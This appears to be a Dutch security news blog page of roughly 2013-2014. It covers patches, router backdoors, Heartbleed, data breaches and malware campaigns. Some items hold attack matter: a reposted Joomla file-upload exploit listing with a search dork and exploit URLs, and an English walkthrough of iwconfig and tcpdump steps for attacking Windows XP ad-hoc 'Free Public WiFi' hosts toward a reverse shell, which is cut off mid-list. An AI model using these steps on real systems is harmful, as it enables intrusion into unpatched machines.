  • internet-explorerMicrosoft is donderdagavond begonnen met het uitrollen van een update voor Internet Explorer. De update verhelpt een lek in de browser dat afgelopen weekend aan het licht kwam. Opmerkelijk is dat de update ook komt naar Windows XP, waarvan Microsoft de ondersteuning pas heeft beëindigd.


    Microsoft laat in een blogpost op TechNet weten dat de update is getest voor alle kwetsbare versies van Internet Explorer en zal worden verspreid. "De meerderheid van de klanten heeft het automatisch updaten ingeschakeld staan. Zij hoeven geen actie te ondernemen", zo staat er.

  • linksys2Aan het begin van dit jaar berichtten we over de geheime achterdeur 'TCP 32764'  in verschillende routers , waaronder, Linksys, Netgear, Cisco en Diamond. Via TCP poort 32764 kon een aanvaller opdrachten verzenden met behulp van een command-line shell zonder dat verificatie als beheerder nodig is.

    Eloi Vanderbeken, de Reverse-ingenieur uit Frankrijk, die deze backdoor ontdekte heeft vastgesteld dat ondanks de fout is hersteld in de laatste firmware release, SerComm dezelfde achterdeur op een andere manier weer heeft toegevoegd.

  • google easter eggHet is bijna pasen en dus tijd voor de paashaas met zijn eieren!

    Niet alleen de paashaas verstop zijn eieren, het internet staat ook vol met verrassende 'easter eggs'

     

    Zo heeft google een aantal leuke easter eggs in haar zoekmachine verstop:

    typ in de google zoekmachine:

    1. zerg rush
    2. atari breakout (afbeeldingen)
    3. conway's game of life (kijk aan de rechter kant)
    4. Festivus (kijk aan de linker kant)
    5. the answer to life the universe and everything
    6. www.google.com.hk/landing/teleport/
    7. Google translate for animals
  • phising

    Cybercriminelen gebruiken de computers van breedbandgebruikers voor het hosten van phishingsites. Dat blijkt uit een analyse van een groot aantal phishingmails waarin de linkjes naar de IP-adressen van thuisgebruikers wijzen. Het gaat om gebruikers die Remote Desktop op Windows hebben ingeschakeld.

    Via Remote Desktop is het mogelijk om op afstand toegang tot de computer te krijgen. Standaard staat dit niet ingeschakeld, maar er zijn volgens de onderzoekers genoeg mensen die het inschakelen. Het is voor aanvallers mogelijk om naar computers met RDP te zoeken.

  • samsung s5 fingerprint scannerHet is een Duitse beveiligingsonderzoeker gelukt om de vingerafdrukscanner van de Galaxy S5 te foppen door een dummy van zijn eigen vingerafdruk van houtlijm te gebruiken. Hij gebruikte daarvoor dezelfde dummy als die om Touch ID op de iPhone 5s te omzeilen.

    De methode werkt door een vingerafdruk van bijvoorbeeld de achterkant van een telefoon op de foto te nemen en van die foto een mal te maken. Met die mal kan een kwaadwillende de vingerafdruk reproduceren op bijvoorbeeld houtlijm. Door de dummy van houtlijn op de eigen vinger te leggen, kan de onderzoeker de vingerafdrukscanner van de Galaxy S5 foppen, meldt Heise.

  • wordpress-securityWordPress heeft een week voordat versie 3.9 uitkomt een kritiek lek in zijn contentmanagementsysteem gedicht, waarmee kwaadwillenden zich toegang via nagemaakte authenticatie-cookies konden verschaffen. Ook zijn drie kleinere lekken gedicht.

    Het lek zit niet alleen in versie 3.8, die door de patch naar versie 3.8.2 wordt gebracht, maar ook in versie 3.7 en de vroege versie van 3.9. Ook voor die versies heeft WordPress updates uitgebracht. De patch die het lek moet dichten heeft de aanduiding CVE-2014-0166 gekregen. De kwetsbaarheid werd door WordPress zelf ontdekt.

  • OpenSSL-Heartbleed-vulnerabilityEr is een ernstig lek aangetroffen in OpenSSL. De advisory van OpenSSL raadt gebruikers aan zo snel mogelijk te upgraden naar OpenSSL 1.0.1g.

    De Heartbleed Bug is een ernstige kwetsbaarheid in het populaire OpenSSL. De kwetsbaarheid zorgt ervoor dat de gegevens die onder normale omstandigheden beschermd worden door de SSL/TLS encryptie laag gecompromitteerd kunnen worden. Communicatie via SSL/TLS biedt beveiliging en privacy voor toepassingen zoals web, e-mail, instant messaging (IM) en virtual private networks (VPN).

  • aclu logoVolgens het Websense Security Labs 2014 Threat rapport stonden maar liefst 85% van alle kwaadaardige links in web en e-mail aanvallen op gecompromitteerde legitieme websites.

    Websites in de categorieën bedrijf en economie, ICT, winkelen en reizen staan in de top 10 van gecompromitteerde sites. Daarnaast lijken Magnitude en Neutrino de toorts over te nemen van Blackhole als meest gebruikte exploit kits. Waarschijnlijk komt dit door de arrestatie van de maker van de Blackhole exploit kit.

  • layer 7 ddos attack using xss flaw

    An application layer or 'layer 7' distributed denial of service (DDoS) attacks is one of the most complicated web attack that disguised to look like legitimate traffic but targets specific areas of a website, making it even more difficult to detect and mitigate.

     
    Just Yesterday Cloud-based security service provider 'Incapsula' detected a unique application layer DDoS attack, carried out using traffic hijacking techniques. DDoS attack flooded one of their client with over 20 million GET requests, originating from browsers of over 22,000 Internet users.
  • hackerWhiteHat Matt Johansen en Johnathan Kuskos hebben een gedetailleerd overzicht van de top 10 hacking technieken van 2013 gepubliceerd, beschikbaar via dit webinar. Peleus Uhley, Lead Security Strategist bij Adobe, gaat in zijn blog dieper in op een aantal notaties.

    1. XML-gebaseerde aanvallen zullen meer aandacht krijgen

    Twee van de top 15 aanvallen waren XML-gebaseerde aanvallen. Aangezien XML vaak wordt gebruik als formaat voor data-overdacht, bijvoorbeeld bij SOAP, is het een interessant studieobject. (XML is een data-formaat, Dit is XML. HTML is een speciale versie van XML.

  • boxee logoHackers hebben de namen, e-mailadressen, berichten en gedeeltelijke inloggegevens van meer dan 158.000 forum gebruikers van Boxee.tv online gezet. Boxee.tv is een webbased televisiedienst die vorig jaar werd overgenomen door Samsung.

    Scott A. McIntyre verklaarde tegen Ars Technica dat een volledige kopie van de gestolen forumgegevens vorige week op grote schaal beschikbaar werd. Dinsdag begonnen medewerkers van de wachtwoordendienst LastPass hun klanten die voorkwamen in het bestand van 800 MB te waarschuwen en dringend te adviseren hun Boxee.tv wachtwoord te wijzigen. Het bestand circuleert nog steeds online en bevat volgens LastPass persoonsgegevens van 158.128 users, ongeveer 172.000 e-mailadressen en de gehashde wachtwoorden die overeenkwamen met de Boxee accounts.

  • wifi-drone-hijackingBeveiligingsonderzoekers hebben een drone omgebouwd om al vliegende wifi-verbindingen met telefoons, tablets en andere apparaten met wifi te kunnen kapen. De drone doet zich voor als een vertrouwd netwerk, waarna het apparaat automatisch met de drone verbinding maakt.

    De onderzoekers, die hun bevindingen volgende week op de Black Hat-conferentie in Singapore zullen presenteren, hebben de drone al gedemonstreerd aan CNN. In principe is het apparaat een vliegende variant op de Pineapple, een apparaat waarmee apparaten van nietsvermoedende passanten ertoe worden verleid om verbinding te maken, waarna de verbinding kan worden onderschept.

  • linux wormEen Linux-worm die vorig jaar november voor het eerst werd ontdekt heeft inmiddels 31.000 apparaten geïnfecteerd, waarvan 12.000 routers, printers en IP-camera's. Dat stelt anti-virusbedrijf Symantec. In januari werd er een nieuwe variant ontdekt die besmette apparaten naar digitale valuta laat delven.

    Het gaat dan om Mincoin en Dogecoin. Een reden dat de malwaremaker specifiek op deze valuta uit is, is dat dit nog steeds succesvol met besmette consumentenapparatuur te doen is, terwijl het delven van Bitcoins specifieke ASIC-chips vereist om de moeite waard te zijn. Echt rijk lijkt de malwaremaker nog niet te worden, De 42.438 verzamelde Dogecoins waren 46 dollar waard en de 282 gedolven Mincoins zouden zo'n 150 dollar waard zijn.

  • pwn2ownNadat Internet Explorer 11, Mozilla Firefox en Apple Safari al waren gehackt, is ook Google Chrome tijdens de Pwn2Own-hackerwedstrijd gesneuveld. Het Franse beveiligingsbedrijf VUPEN, dat eerder IE11, Adobe Reader, Adobe Flash Player en Firefox hackte, wist nu ook Chrome op de knieën te krijgen.

    Via het lek in Chrome is het mogelijk om willekeurige code op het systeem uit te voeren en het onderliggende systeem over te nemen. Tijdens het evenement verscheen ook de bekende hacker George Hotz, die in het verleden al de iPhone en Playstation 3 wist te kraken. Dit keer moest Mozilla Firefox het ontgelden. Het was de vierde keer dat Firefox tijdens Pwn2Own gekraakt werd. Ook Internet Explorer 11 moest er gisteren weer aan geloven. Microsofts browser werd in totaal drie keer 'gepwnd'.

  • wordpress-securityBij een grote ddos-aanval is een functionaliteit in Wordpress misbruikt om de aanvalskracht te vergroten. Dat stelt een beveiligingsbedrijf. Het gaat om de xml-rpc-functionaliteit. Die kan worden misbruikt door http-requests te spoofen. 


    Weblogs gebruiken de xml-rpc-functionaliteit onder meer om andere blogs te laten weten dat er naar ze wordt gelinkt, zogeheten pingbacks. Die functionaliteit is echter ook te misbruiken, schrijft beveiligingsbedrijf Sucuri.

  • WhatsApp-logoDe WhatsApp overname door facebook heeft de reputatie van het bedrijf niet goed gedaan. Veel gebruikers lijken van plan om te switchen waar een aantal dit al gedaan hebben.

    Mobile messaging apps worden vaak gebruikt om gevoelige gegevens uit te wisselen, dit zowel prive als zakelijk.  Het is belangrijk de gegevens die worden opgeslagen door de dienstverlener end-to-end zijn geencrypt. Dit is nog niet in het geval van WhatsApp!

    Er zijn veel verschillende mobiele messaging-apps, zoals in het Japan gevestigde Line, China's WeChat, Korea-based KakaoTalk, Canada's Kik en het in India gevestigde Hike.eEr zijn er nog veel meer maar ze zijn niet end-to-end geencrypte 'messengers'.
    Het wordt hoog tijd om over te schakelen naar een aantal plaatsvervangers die wel met end-to-end encryptie werken! Er zijn een aantal oplossingen beschikbaar zoals - Telegram, Surespot, Threema, TextSecure, RedPhone etc.

  • iPhone-KeyloggerBeveiligingsonderzoekers hebben een methode ontwikkeld die hun in staat stelt via een app alle iOS-handelingen van een gebruiker te registreren en naar een server te sturen. De app werkt ook op iPhones zonder jailbreak omdat de onderzoekers de App Store kunnen omzeilen.

    Medewerkers van het beveiligingsbedrijf FireEye tonen op hun blog een proof-of-concept-app die ze buiten de App Store om kunnen distribueren. De app draait op de achtergrond en is in staat informatie over alle handelingen van de gebruiker op te slaan, zo worden ook aanrakingen van het touchscreen opgeslagen inclusief schermcoördinaten. De app is getest op iOS 7.0.4 maar zou volgens de onderzoekers ook op versies 7.0.5, 7.0.6 en 6.1.x moeten werken.

  • fritz!boxHet lek in FRITZ!Box modems waardoor onder andere klanten van XS4ALL werden aangevallen is veel ernstiger dan gedacht, aldus een Duitse website. Via het lek kregen criminelen toegang tot de modems, die er vervolgens telefoonfraude mee pleegden, wat voor hoge rekeningen zorgde.

    In eerste instantie werd gesteld dat het probleem zich alleen voordeed bij gebruikers die Remote Access of de MyFRITZ! service op de modem hadden ingeschakeld. Het Duitse Heise Security meldt dat het probleem in principe alle gebruikers van een FRITZ!Box treft en dat het niet vereist is dat Remote Access is ingeschakeld. "Het probleem is dus veel ernstiger dan eerst werd gedacht", zo laat Heise weten.

  • magento-logoHet lijkt erop dat geen dag voorbij gaat zonder dat je iets hoort over het hacken van een website of het stelen van creditcardgegevens of andere gevoelige informatie.
    De markt van E-commerce is booming business, en dat biedt nog meer mogelijkheden voor hackers. Er zijn veel kant en klare e-commerce platforms beschikbaar, die gemakkelijk te installeren en eenvoudig te beheren zonder extra kosten. Daarbij is 'Magento' een van de meest populaire.
    Onlangs hebben security onderzoekers van Securatary een kritische cross-store kwetsbaarheid in het Magento platform gemeld. Hierbij verkrijgen aanvallers 'escalation privileges' door het creëren van een gebruiker met beheerdersrechten op elke 'Gostorego' online winkel.
    De 'authentication bypass' kwetsbaarheid is van toepassing op ongeveer 20.000 sites. Om het lek te misbruiken, zal de aanvaller de HOST header moeten modificeren. Een envoudige aanpassing van de URI het GET-request volstaat.
  • linksys2Een worm genaamd TheMoon infecteert op dit moment Linksys-routers en laat besmette routers vervolgens naar andere kwetsbare routers zoeken. Een aantal dagen geleden waarschuwde een Amerikaanse provider al voor de aanvallen, die op meer modellen zijn gericht dan eerst werd aangenomen.

    De worm maakt verbinding met poort 8080, al dan niet via SSL. Vervolgens wordt de "/HNAP1/" URL opgevraagd, die een lijst met routerfeatures en firmwareversies oplevert. Hierna stuurt de worm een exploit naar een kwetsbaar CGI-script dat op deze routers draait en waarvoor geen authenticatie is vereist. Het script controleert namelijk niet het opgegeven admin-wachtwoord, waardoor elk willekeurig admin-wachtwoord werkt.

  • mailEen nieuw ontdekt spionagevirus wordt door de ontdekkers omschreven als één van de meest geavanceerde spionagecampagnes ooit, maar de infecties verliepen voor zover bekend op traditionele wijze. De nieuwe malware heet 'The Mask' en heeft meer dan 380 slachtoffers in 31 landen gemaakt.

    Slachtoffers ontvingen een spear phishingmail met een linkje dat naar een filmpje of nieuwsartikel leek te wijzen. Zodra de ontvanger de link opende werd die naar een website doorgestuurd die de computer probeerde te infecteren. Vervolgens werd de website geladen waar de link in de e-mail in eerste instantie naar leek te wijzen. Eenmaal actief probeerde The Mask allerlei informatie van de besmette computer te stelen, zoals documenten, encryptiesleutels, SSH-sleutels, VPN-configuraties en RDP-bestanden.

    De malware werd door Kaspersky Lab ontdekt toen het een lek in de virusscanners van het Russische anti-virusbedrijf probeerde te misbruiken. Door van dit lek gebruik te maken zou de malware onzichtbaar voor de virusscanner zijn. Het lek in de anti-virussoftware werd in 2008 door Kaspersky gepatcht. De spionagecampagne zou echter al sinds 2007 actief zijn. Tijdens het onderzoek naar de malware in januari van dit jaar werd de campagne opeens gestopt.

    Verspreiding

  • kassasysteemDe malware die op de kassasystemen van de Amerikaanse warenhuisketen Neiman Marcus allerlei gegevens van betaalkaarten uit het geheugen wist te kopieren bleef maanden lang verborgen, zo heeft het bedrijf laten weten. Recentelijk waarschuwde het bedrijf dat er malware op de kassa's was ontdekt.

    Over de aanval zijn nu meer details bekend geworden. Zo was de malware op de kassasystemen, een RAM-schraper die betaalkaartgegevens uit het geheugen kopieerde, tussen 16 juli 2013 en oktober 2013 actief en werd pas deze maand ontdekt. In de periode dat de malware actief was is er met 1,1 miljoen betaalkaarten betaald. De RAM-schaper had echter niet alle kassasystemen bij de 42 vestigingen van de warenhuisketen geïnfecteerd. Daarnaast was de malware ook niet altijd actief.

  • androidOnderzoekers hebben malware ontdekt die als eerste Windowscomputers infecteert om vervolgens aangesloten Android-toestellen te besmetten en zo mobiele TAN-codes voor internetbankieren te onderscheppen. Hoe de Windows-malware zich verspreidt laat anti-virusbedrijf Symantec niet weten.

    Eenmaal actief downloadt Trojan.Droidpak, zoals de malware heet, een kwaadaardig APK-bestand en installeert de Android Debug Bridge (ADB). Via ADB wordt vervolgens op elk aangesloten Android-toestel het kwaadaardige APK-bestand geïnstalleerd. Dit bestand zoekt naar de aanwezigheid van een specifieke Koreaanse mobiel bankieren applicatie op het Android-toestel.

  • madcatz logoFirmware-modder Paul O'Brien is erin geslaagd om root-toegang te forceren op de op Android draaiende MOJO-console van Mad Catz. Gebruikers die de hack installeren kunnen naast het draaien van apps die root vereisen ook meer content downloaden in de Play Store.

    De MOJO-console, die een prijskaartje heeft van 250 euro en is gebaseerd op een Tegra 4-soc van Nvidia, is te kraken door gebruik te maken van de zogeheten Superboot-image. Voor de installatie is een standaard usb male a-a-kabel nodig en een pc die op Windows, OS X of Linux draait. Na installatie wordt de su-tool en de superuser-apk geïnstalleerd. De originele MOJO-rom blijft onaangetast, evenals de data-partitie.

    Na installatie van de zogeheten MoDaCo Mod kunnen op de spelconsole Android-apps geopend worden die root-rechten nodig hebben. Daarnaast stelt Paul O'Brien dat zijn mod toegang geeft tot een groter app-aanbod in de Play Store.

  • login-password'123456' was in 2013 het meest gebruikte wachtwoord op het internet, waardoor voor de eerste keer 'password' van de eerste plek werd gestoten. Dat beweert app-ontwikkelaar SplashData, dat al enkele jaren een lijst van meest gebruikte wachtwoorden op het web samenstelt.

    SplashData baseert zich bij het opstellen van de lijst op grote datalekken die in 2013 plaatsvonden, zoals bij Adobe waar de wachtwoorden van miljoenen gebruikers op straat kwamen te liggen. Dat is dan ook een reden dat 'photoshop' en 'adobe123' in het overzicht zijn terug te vinden. Verder wordt de lijst met wachtwoorden gedomineerd door "klassiekers" zoals 'qwerty', 'admin', 'letmein', 'iloveyou' en cijferreeksen als '12345678' en '111111'.

  • TD-W8951ND-smallMeer dan 15,2% van de Algerijnse bevolking maakt gebruik van internet. Het grootste gedeelte wordt verzorgd door Algerie Telecom.

    Ze gebruiken de TP-LINK TD-W8951ND Routers. die ZYXEL  firmware bevatten.

    Abdelli Nassereddine, pentester & Algerijnse Computer Science student heeft 2 lekken in de router openbaar gemaakt. Het gaat hier om een 'unauthorized access' & een 'password disclosure' kwetbaarheid.

    De kwetsbaarheden kunnen eenvoudig kunnen worden uitgebuit.  Dit door een lek in ZYXEL firmware. Hieronder worden de details van de kwetsbaarheden verder uitgelegd.

  • joomla-logoEr is een kwetsbaarheid in het Aclassfb component ontdekt. 

    Explot details:

    • Title : Joomla com_aclassfb File Upload Vulnerability
    • Category : Web Applications
    • Type : PHP
    • Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
    • Tested : Mozila, Chrome, Opera -> Windows & Linux
    • Vulnerabillity : File Upload
    • Dork : inurl:com_aclassfb

    File Upload: http://127.0.0.1/index.php?option=com_aclassfb

    Exploit : http://127.0.0.1/index.php?option=com_aclassfb&Itemid=[ID]&ct=[CATEGORY]&md=add_form

  • Target logoDe winkelketen Target heeft in een persbericht laten weten dat er persoonsgegevens van 70 miljoen mensen zijn gestolen. Eerder waren al creditcardgegevens en mogelijk ook pincodes van 40 miljoen klanten buitgemaakt. Het ziet er nu naar uit dat die pincodes online zijn gezet.

    De Amerikaanse winkelketen Target laat in een persbericht weten dat uit het onderzoek naar de aanval uit december blijkt dat de persoonsgegevens van 70 miljoen mensen zijn ontvreemd. Eerder was al duidelijk dat de creditcardgegevens van 40 miljoen mensen waren buitgemaakt. Dit was mogelijk door het infecteren van kassa's met malware. Van de creditcards zijn mogelijk begin januari de versleutelde pincodes op een ondergronds forum geplaatst.

    Bij de buitgemaakte persoonsgegevens gaat het om namen, adressen, telefoonnummers en e-mailadressen. Per klant verschilt de gestolen informatie. Target laat weten dat het contact gaat opnemen met de klanten die geregistreerd staan met een e-mailadres. Het zal dan tips geven over hoe de klanten zich kunnen wapenen tegen oplichters. De tips zijn al op de website van het bedrijf geplaatst.

  • Oracle dicht in een patch die dinsdag uitkomt 36 kwetsbaarheden in Java, waaronder 34 kwetsbaarheden die op afstand zijn te misbruiken en daardoor als ernstig te classificeren zijn. In totaal worden dinsdag 147 kwetsbaarheden in Oracle-producten gedicht.

    java-securityDe 34 Java-kwetsbaarheden die op afstand zijn te misbruiken zijn het ernstigst: die stellen een aanvaller mogelijk in staat om bijvoorbeeld vanuit een webbrowser malware te installeren op de pc van de gebruiker. Het is niet duidelijk bij hoeveel van de kwetsbaarheden dat daadwerkelijk kan. In een van de gevallen gaat het om een kwetsbaarheid waarvan de ernst op een schaal van 1 tot 10 een '10' meekrijgt.

    Oracle geeft elk kwartaal een grote beveiligingspatch uit. In totaal worden 147 bugs geplet in de opkomende patchronde, waarmee het een van Oracles grootste patchrondes tot nu toe is. Naast kwetsbaarheden in Java worden ook beveiligingsproblemen in Solaris, Oracles databasesoftware en Oracle Fusion gedicht.

    Kwetsbaarheden in Java worden vaak gebruikt om malware te installeren. Daarvoor worden kant-en-klare tools gebruikt, zogenoemde exploit kits. Via malafide banners of door een website te hacken wordt de exploit kit aan slachtoffers geserveerd. In het verleden boden meerdere grote Nederlandse websites per abuis exploit kits aan, waaronder NU.nl, NRC.nl en Telegraaf.nl. Onlangs verspreidde het Surinaamse ministerie van financiën malware via bugs in Java.

    Bron: Tweakers.net

  • linksys2Een Franse beveiligingsonderzoeker heeft een backdoor in verschillende routers van Linksys en Netgear ontdekt, waardoor kwaadwillenden zonder inloggegevens toegang tot het beheerderspaneel kunnen krijgen. De backdoor werd door 'reverse engineer' Eloi Vanderbeken ontdekt.

    Het probleem ontstaat doordat bij sommige routers TCP-poort 32764 open staat. Door het sturen van een specifiek request naar deze poort kan een aanvaller direct toegang tot het beheerderspaneel krijgen. Daarbij maakt het niet uit of de eigenaar van de router een wachtwoord heeft ingesteld. Via het beheerderspaneel kan een aanvaller allerlei zaken aanpassen, zoals de servers waar het verkeer van de gebruiker langs loopt.

    Vanderbeken stelt dat de backdoor in de Linksys WAG200G, Netgear DM111Pv2 en Linksys WAG320N aanwezig is. Mogelijk zouden ook NetGear DG934, DG834, DG834G, WPNT834, WG602, WGR614, DGN2000, WAG120N, WAG160N en WRVS4400N kwetsbaar zijn. Wat gebruikers kunnen doen om zich te beschermen laat de onderzoeker niet weten.

    Bron: Security.nl

    Update 6-1-2014:

    Met behulp van een Python script kan de explot worden uitgevoerd. Deze kan op Github worden gedownload.

    Om deze aanval uit te voeren, moet de aanvaller onderdeel van het netwerk zijn. Met een Shodan scan zijn er meer dan 2000 kwetsbare routers beschikbaar op het internet Search-1 & Search-2.


    Update 11-1-2014:
    Cisco heeft een waarschuwing afgegeven voor een backdoor in twee type routers en een accesspoint.  De 'ongedocumenteerde testinterface', zoals Cisco het noemt, bevindt zich in de WRVS4400N Wireless-N en de RVS4000 4-port Gigabit Security Routers en het WAP4410N Wireless-N Access Point.

  • snapchatHackers hebben een database met naar eigen zeggen telefoongegevens van 4,6 miljoen Snapchat-gebruikers online gezet. Het was al tijden bekend dat de telefoonnummers van Snapchat-gebruikers te achterhalen waren, maar de dienst ondernam lange tijd geen actie.

    De database werd online gezet via de site SnapchatDB.info. Volgens de makers van de site gaat het om gebruikersnamen en telefoonnummers van 4,6 miljoen gebruikers, die verkregen zijn via een exploit die recent gedicht is. "Het bedrijf was onwillig om het te patchen totdat ze wist dat het te laat was", aldus de hackers, die verklaren dat de publicatie bedoeld is om het publiek bewust te maken van beveiligingsrisico's.

    De laatste twee cijfers van de telefoonnummers zijn onleesbaar gemaakt 'om spam en misbruik tegen te gaan', maar de hackers tonen zich bereid deze vrij te geven. Volgens hen zijn de nummers ook te relateren aan Facebook- en Twitter-accounts omdat mensen vaak dezelfde gebruikersnaam hanteren.

    Snapchat werd naar verluidt al maanden geleden op de hoogte gebracht van de exploit, maar reageerde daar niet op. Op 27 december maakte de dienst alsnog bekend maatregelen genomen te hebben en Snapchat wees toen zelf al op de mogelijkheid dat een database met gebruikersnamen en telefoonnummers kon worden samengesteld. Details over de maatregelen gaf de dienst niet.

  • rfidchip-hackEen Oostenrijkse onderzoeker is er in geslaagd om, door een rfid-chip te herprogrammeren, binnen te komen in Weense appartementencomplexen. In 43 procent van de gevallen kwam hij succesvol binnen met behulp van de skipas.Het gekraakte 'Begeh'-systeem werd volgens de onderzoeker vorig jaar in 9000 appartementencomplexen in Wenen gebruikt en inmiddels zouden de 10.000 installaties al zijn gepasseerd. Ook wordt het systeem uitgebreidt naar andere steden in Oostenrijk. Het systeem gebruikt rfid-chips om bewoners van appartementencomplexen te authenticeren, evenals onder meer postbodes en de hulp- en opsporingsdiensten. De chips blijken echter nauwelijks beveiligd, zo legde beveiligingsonderzoeker Adrian Dabrowski uit tijdens de CCC-beveiligingsconferentie in Hamburg.

    Dabrowski wist de inhoud van de kaart te klonen door een rfid-scanner per post naar zichzelf te versturen. Doordat de postbode die het pakket bezorgde een Begeh-pas gebruikte om zijn appartementencomplex te betreden, kon hij de inhoud van de pas met de scanner in het pakket op afstand kopiëren. "Iedereen kan een kopie van een kaart krijgen zonder dat gebruiker van de pas het doorheeft", aldus Dabrowski. Bovendien kost een hack weinig: "Het hacken van het systeem kost minder dan 20 euro." Overigens is een eventuele inbreker daarna waarschijnlijk nog niet binnen bij de bewoner zelf; daarvoor is waarschijnlijk nog een extra sleutel vereist.

  • A few weeks ago Joshua Wright did a SANS webcast on Exploiting Modern Wireless Networks. For a long time WiFi attacks have focused on either cracking WEP, or brute forcing a WPA shared key. Josh goes over some of the new attack vectors against wireless and how you can use them in a penetration test.

    My favorite slide had to do with that obscure “Free Public WiFi” SSID that we see all over the place. I see these all the time at airports, but also at hotels and other commonly utilized public wifi areas. Apparently this is the default name for ad-hoc networks that are created by Windows XP SP2. Obviously this gets us excited ( MS 08-067). If they are running an XP SP2 box, we can probably assume that the machine is not frequently administered, and most likely not patched. Here are the simple steps that Josh Wright provided in order to exploit this machine:

    • Connect to the adhoc network
    # iwconfig wlan1 essid "Free Public WiFi" mode adhoc
    • Use tcpdump to find the IP (bolded IP below) of the XP box hosting the ad hoc network. Note: the hosting box will be broadcasting NetBIOS packets to help configure associated clients.
    # tcpdump -ni wlan1 -s0 -nt
    IP 169.254.131.118.138 > 169.254.255.255.138: NBT UDP PACKET(138)
    • Configure your IP (for the reverse shell to shovel back to)
  • java-securityHet afgelopen jaar was Java de meest aangevallen software op internet, zo blijkt uit cijfers van het Russische anti-virusbedrijf Kaspersky Lab. 90,5% van alle exploits die de virusbestrijder in 2013 waarnam waren tegen de browserplug-in van Oracle's Java gericht.

    De exploits maken misbruik van verschillende kwetsbaarheden in de software. Zodra een gebruiker met een kwetsbare Java-versie een gehackte of kwaadaardige website bezoekt, wordt er malware op de computer geïnstalleerd.

  • Social_engineer_toolkitDe Sociaal - Engineer Toolkit (SET ) is gemaakt en geschreven door de oprichter van TrustedSec. Het is een opensource -  op Python gebaseerd - gereedschap gericht op penetratie testen rond sociaal -Engineering . SET is gepresenteerd op grootschalige conferenties, waaronder Blackhat , DerbyCon , Defcon , en ShmooCon . Met meer dan twee miljoen downloads , is SET de standaard voor social engineering penetratie tests en is de defacto standaard binnen de security gemeenschap .

    De Sociaal Engineer Toolkit wordt vooral gebruikt om geavanceerde technologische aanvallen te testen. SET is opgenomen in de nieuwste versie van Back Track.  Het kan ook worden gedownload via GitHub met het volgende commando:
    git clone https://github.com/trustedsec/social-engineer-toolkit/ ingesteld. 
    Download

  • jbossEen beveiligingslek in de JBoss Application Server wordt actief door aanvallers gebruikt om kwetsbare installaties over te nemen, zo waarschuwt beveiligingsbedrijf Imperva. Het bedrijf heeft na het openbaar worden van een exploit die misbruik van het lek maakt een toename van het aantal aanvallen gezien.

    JavaBeans Open Source Software Application Server (JBoss) werd eind vorig jaar tot WildFly omgedoopt. Het is een applicatieserver die door duizenden websites wordt gebruikt. In 2011 werd er een kwetsbaarheid gedemonstreerd die misbruik van een standaardconfiguratie in de JBoss-managementinterface maakt, om aanvullende functionaliteit aan de webserver toe te voegen.

    Zodra een aanvaller dit heeft gedaan kan hij een willekeurige applicatie installeren en volledige controle over de JBoss-infrastructuur krijgen én de sites die van de applicatieserver gebruik maken. In september werd er voor verschillende producten van HP die JBoss gebruiken en lek waren een CVE-nummer toegekend. HP heeft de kwetsbaarheid via een update opgelost.

    Kwetsbaar

    Er zijn echter nog veel meer fabrikanten die de kwetsbare software in hun eigen producten gebruiken, waaronder McAfee en Symantec. Begin oktober verscheen er een exploit die van het lek misbruik maakt. Sindsdien zag Imperva een toename van het aantal aanvallen. Inmiddels zouden meer dan 200 websites die op JBoss-servers draaien zijn gehackt. Het gaat onder andere om overheids- en universiteitssites.

    JBoss 7.1.1 is de laatste versie van de software, maar veel organisaties werken vanwege compatibiliteitsredenen nog steeds met JBoss 4.x en 5.x, omdat ze oude applicaties gebruiken die voor deze versies ontwikkeld zijn. Deze organisaties krijgen het advies om de instructies voor het beveiligen van hun JBoss-installaties op te volgen.

    Bron: Security.nl

  • androidVeel beveiligingslekken die op Android-smartphones aanwezig zijn worden door aanpassingen van de fabrikant veroorzaakt, zo hebben onderzoekers ontdekt. 60% van de lekken die onderzoekers op de onderzochte Android-smartphones aantroffen, waren door aanpassingen van de fabrikant geïntroduceerd.

    Hoewel Google de basis van het Android-platform ontwikkelt, wijzigen leveranciers zoals Samsung, Sony en HTC het platform om zo met hun hardware te integreren. Deze leveranciers voegen ook apps toe die ze zelf of hun partners hebben ontwikkeld.

    Onderzoekers van de North Carolina State University onderzochten 10 Android-smartphones, waarvan vijf nieuwe modellen met Android-versie 4.x en vijf modellen met Android-versie 2.x van Samsung, HTC, LG, Sony en Google. 80% van de apps die op deze modellen stonden waren door de fabrikant geïnstalleerd.

    Kwetsbaar

    "Alle tien apparaten waren alleen al door de vooraf geïnstalleerde apps kwetsbaar", zegt onderzoeker Xuxian Jiang. "De oudere versies hadden gemiddeld 22,4 lekken per toestel, terwijl nieuwere versies gemiddeld 18,4 lekken per toestel hadden. En de nieuwere versies waren niet altijd veiliger. Sommige recentere modellen waren zelfs minder veilig dan hun voorgangers." Van de tien onderzochte modellen had de Google Nexus 4 de minste lekken.

    Via de kwetsbaarheden was het mogelijk om zonder toestemming van de gebruiker audio op te nemen, telefoonnummers te bellen en de mogelijkheid om de gegevens van de gebruiker te wissen. Verder bleek dat 85% van de vooraf geïnstalleerde apps teveel rechten had. Het gaat dan om rechten die de app heeft, maar niet gebruikt. De onderzoekers zullen hun bevindingenmorgen tijdens een beveiligingsconferentie in Berlijn presenteren.

    distribution of vulnerabilities

    Telco's ontvangen 380 meldingen via meldpunt voor lekken Microsoft looft 100.000 dollar uit voor bijzondere exploits

    Bron: Security.nl

  • internet-explorerMicrosoft waarschuwt voor een ernstig beveiligingslek in alle versies van Internet Explorer dat op het moment actief wordt misbruikt om computers met malware te infecteren, terwijl er geen beveiligingsupdate beschikbaar is om het probleem op te lossen.

    Volgens Microsoft zijn er alleen meldingen van een beperkt aantal gerichte aanvallen tegen Internet Explorer 8 en 9, hoewel het probleem in alle ondersteunde versies aanwezig is. Via de kwetsbaarheid kan een aanvaller willekeurige code op het onderliggende systeem uitvoeren. De exploit die Microsoft analyseerde werkt alleen op Windows XP en Windows 7

    Maatregelen

    Het bezoeken van een gehackte of kwaadaardige website met een kwetsbare IE-versie is voldoende om besmet te raken. Dustin Childs van Microsofts Trustworthy Computing stelt dat de softwaregigant aan een update werkt. In de tussentijd zijn er verschillende maatregelen die IE-gebruikers kunnen nemen.

    Zo is er een "Fix it" oplossing waarbij IE-gebruikers het kwetsbare onderdeel met één muisklik kunnen uitschakelen. Deze oplossing werkt echter alleen voor de 32-bit versies van Internet Explorer. Andere opties zijn het verhogen van de Internet en lokale intranet beveiligingszones naar "Hoog" en het blokkeren van ActiveX Controls en Active Scripting in deze zones.

